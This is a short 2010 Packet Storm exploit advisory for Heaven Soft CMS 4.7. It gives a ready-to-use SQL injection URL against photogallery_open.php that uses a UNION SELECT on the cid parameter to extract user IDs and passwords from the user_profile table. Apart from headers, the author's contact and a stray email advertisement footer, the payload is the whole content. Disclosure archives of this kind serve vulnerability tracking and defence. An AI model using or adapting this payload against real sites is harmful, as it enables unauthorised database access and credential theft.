Heaven Soft CMS 4.7 SQL Injection

2010-05-14T00:00:00
ID PACKETSTORM:89552
Type packetstorm
Reporter CoBRa_21
Modified 2010-05-14T00:00:00

Description

                                        
                                            `  
  
  
-------------------------------------------------------------------------------------------  
  
Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability   
  
-------------------------------------------------------------------------------------------  
  
Author: CoBRa_21  
  
Mail: uyku_cu@windowslive.com  
  
Script Home: http://www.heavensoft.com.pk/  
  
-------------------------------------------------------------------------------------------  
  
Sql Injection:  
  
http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--  
  
-------------------------------------------------------------------------------------------  
  
Melekler Bize Aglar , Biz Halimize Guleriz......  
  
_________________________________________________________________  
Yeni Windows 7: Size en uygun bilgisayarı bulun. Daha fazla bilgi edinin.  
http://windows.microsoft.com/shop  
  
  
`